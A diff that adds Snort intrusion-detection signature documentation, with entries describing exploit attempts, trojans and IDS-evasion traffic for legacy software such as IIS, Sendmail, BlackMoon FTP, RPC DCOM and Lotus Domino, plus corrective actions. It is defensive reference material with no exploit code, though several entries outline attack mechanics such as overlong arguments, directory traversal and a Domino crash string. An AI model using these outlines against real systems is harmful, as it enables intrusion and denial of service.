+Upgrade to OpenSSH v3.4 or later
+
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-18.html
+
+--
--- /dev/null
+++ b/doc/signatures/994.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 994
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/119-12.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-12
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unkown.
+
+--
+Detailed Information:
+This event is generated by the http_inspect pre-processor when a tab
+character is detected in a web request. This is non-standard, but Apache
+web servers may use this character as a space delimeter.
+
+--
+Affected Systems:
+	Apache web servers
+
+--
+Attack Scenarios: 
+An attacker may supply the tab character in place of a space in a web
+request.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000578.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000578
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_search.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_search.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/495.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 495
+
+-- 
+
+Summary: 
+This event is generated by an unsuccessful attempt to execute a command. This may be indicative of post-compromise behavior indicating the use of a Windows command shell.
+
+-- 
+
+Impact: 
+Serious. An attacker may have the ability to execute commands remotely
+
+--
+Detailed Information:
+This event is generated by an unsuccessful attempt to execute a Windows command which generates the response "Bad command or filename". For example, it is generated by the Windows operating system if the executable file to be run from the command line is not found. 
+
+Seeing this response in HTTP traffic indicates that an attacker may have been able to spawn a shell bound to a web port and has tried to execute a command. Note that the source address of this event is actually
+the victim and not that of the attacker.
+
+--
+
+Attack Scenarios: 
+An attacker gains an access to a Windows web server via IIS vulnerability and manages to start a cmd.exe shell. He then tries to run other commands on the machine.
+
+-- 
+
+Ease of Attack:
+Simple. This post-attack behavior can accompany different attacks.
+
+-- 
+
+False Positives:
+This rule will generate an event if the string "Bad command
+or filename" appears in the content distributed by a web server, in
+which case the rule should be tuned.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Investigate the web server for signs of compromise.
+
+Look for other IDS events involving the same IP addresses.
+
+--
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1972.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1972
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with BlackMoon FTP server PASS command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with privileges of the process running the BlackMoon FTP server. 
+
+--
+Detailed Information:
+The BlackMoon FTP server offers FTP software for Windows hosts.  A vulnerability exists with the PASS command that can cause a buffer overflow and permit the execution of arbitrary commands with the privileges of the process running the BlackMoon FTP server.  The buffer overflow can be caused by supplying an overly long argument with the PASS command.   
+
+--
+Affected Systems:
+Hosts running BlackMoon FTP Server 1.0 through 1.5. 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the PASS command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0126
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1035
+
+--
--- /dev/null
+++ b/doc/signatures/2085.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2085
+
+--
+Summary:
+parse_xml.cgi script on a webserver.
+
+--
+Impact:
+Arbitrary code execution, information disclosure and possible cross site
+scripting.
+
+--
+Detailed Information:
+Multiple vulnerabilities exist in Apple Quick Time Streaming Server and 
+Apple Darwin Streamin Server, such that an attacker can gain information
+on the file system as an intelligence gathering activity for an attack 
+on vulnerable services.
+
+It is also possible for an attacker to inject malicious code into the 
+log file for the server, the impact of this would be to execute the code
+when viewed by the administrator.
+
+It is also directly vulnerable to cross site scripting issues.
+
+--
+Affected Systems:
+	Apple Darwin Streaming Server 4.1.2
+	Apple Quicktime Streaming Server 4.1.1
+
+--
+Attack Scenarios:
+In the case of injecting code to the log files, the attacker would need 
+to make requests to the streaming server with the code inserted in the 
+request.
+
+The attacker can execute an attack on the file system contents using a 
+browser, the attacker needs to include a NULL byte in the request to 
+reveal the directory structure.
+
+The cross site scripting issue does not need anything specific to be 
+done.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6960
+http://www.securityfocus.com/bid/6990
+http://www.securityfocus.com/bid/6955
+http://www.securityfocus.com/bid/6956
+http://www.securityfocus.com/bid/6958
+
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0054
+
+--
--- /dev/null
+++ b/doc/signatures/2260.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid:
+2260
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2605.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2605
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "compare_old_value" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "sname" or
+"oname" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the database
+with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck91.html
+
+--
--- /dev/null
+++ b/doc/signatures/2437.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2437
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in RealOne Player.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+It may be possible for an attacker to execute code of their choosing by
+using a vulnerability in RealOne Player from RealNetworks. If a
+malicious URI is embedded in a SMIL presentation that points to script
+of the attackers choosing, the code may be executed with privileges
+assigned to the "My Computer" zone.
+
+--
+Affected Systems:
+	RealOne Player for Windows	
+
+--
+Attack Scenarios:
+An attacker could embed a URI of their choosing in a presentation and
+entice a user to click the link from within RealOne Player. The code
+referenced by this URI would then be executed on the client machine.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/626.txt
@@ -0,0 +1,79 @@
+Rule:  
+ 
+--
+Sid:
+
+626
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. Having PUSH, ACK and 
+reserve bits 1 and 2 set at the same time is unusual.  While this rule 
+performs content as well as header checking to avoid false positives, 
+this flag combination in the TCP header is possible is possible in a 
+legitimate situation because of the addition of Explicit Congestion 
+Notification (ECN).
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by a system and network 
+administrators.
+
+False positives from ECN enabled systems are possible.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+TCP packets with PUSH, ACK and reserved bits 1 and 2 set at the same 
+time are unusual but possible with Explicit Congestion Notification 
+(ECN).  It is advisable to block TCP packets with these flags set that 
+do not have the ECT bit (TOS bit 6) set in the IP header.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS149
+
+Security Focus:
+http://www.securityfocus.com/infocus/1205
+
+RFC:
+http://www.ietf.org/rfc/rfc2481.txt?number=2481
+
+--
--- /dev/null
+++ b/doc/signatures/2271.txt
@@ -0,0 +1,58 @@
+--
+Rule:
+
+--
+Sid:
+2271
+
+--
+Summary:
+This event is generated when an attacker attempts to connect to the
+trojan FsSniffer.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+The FsSniffer program is a Trojan Horse designed to allow unauthorized
+external access to an infected host.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2536.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2536
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+US-Cert:
+http://www.kb.cert.org/vuls/id/150236
+
+--
--- /dev/null
+++ b/doc/signatures/2949.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2949
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3421.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3421
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2456.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2456
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running attempts to send a file to another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.  This may also provide a less scrutinized means of sharing unauthorized or inappropriate files with others. 
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/2109.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in the Post Office Protocol (POP) command TOP.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by sending a line feed character to a POP server via the TOP command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+RFC 1939:
+http://www.faqs.org/rfcs/rfc1939.html
+
+--
--- /dev/null
+++ b/doc/signatures/1866.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+1866
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer by supplying a very long username to a POP3 service.
+
+--
+Impact:
+Serious. Several POP3 servers are vulnerable to USER buffer overflows.
+
+--
+Detailed Information:
+A very long string data in place of the username can lead to a buffer overflow situation.
+
+A buffer overflow attack can be used to execute arbitrary code (remote shell). A Denial of Service (DoS) is also possible.
+ 
+Check your POP3 service for this vulnerability with common vulnerability scanners.
+
+--
+Affected Systems:
+Ipswich IMail 5.0.5, 5.0.6 and 5.0.7 for Windows NT.
+Other POP3 mail systems may be affected.
+
+--
+Attack Scenarios:
+A attacker may first check the POP3 daemon version and try a buffer overflow attack using a long username string supplied with the USER command.
+
+This may result in full compromise of the host. A Remote shell can be bound to a port after the attack. 
+
+--
+Ease of Attack:
+Simple. Exploit scripts are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check for other events generated by the source IP address.
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3138.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3138
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/1493.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+1493
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+Access to the newuser directory on a host running RBS ISP may indicate
+that an attempt to exploit a well known directory traversal
+vulnerability is being made by appending a ../ to the image variable.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/213.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+213
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "wh00t!".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects Linux operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/119-15.txt
@@ -0,0 +1,79 @@
+Rule: 
+
+--
+Sid: 
+119-15
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects a
+request for a URL that is longer than a specified length. This may
+indicate an attack or an attempt to evade an IDS.
+
+Lotus Domino Server Web servers are reported prone to a Denial of
+Service condition when a long request is made to the server using
+unicode characters. The http_inspect pre-processor will generate this
+event should a Domino server be attacked in this way.
+
+Specifically, when a request is made to /cgi-bin/ with approximately 330
+unicode characters appended to the URL, the webserver will crash and a
+DoS condition will be evident.
+
+The maximum expected length of the URL is user configured.
+
+--
+Affected Systems:
+	All web servers
+	Lotus Domino 6.5.1 and 6.0.3
+
+--
+Attack Scenarios: 
+An attacker may supply an over-long URI in an attempt to evade an IDS or
+in a possible attack against a web server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+iDefense:
+http://www.idefense.com/application/poi/display?id=224&type=vulnerabilities
+
+--
--- /dev/null
+++ b/doc/signatures/2362.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+--
+Sid:
+2362
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application YaBB SE.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+YaBB SE contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the location of the
+script packer.php parameter when making a GET or POST  request 
+to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	YaBB SE YaBB SE 0.8
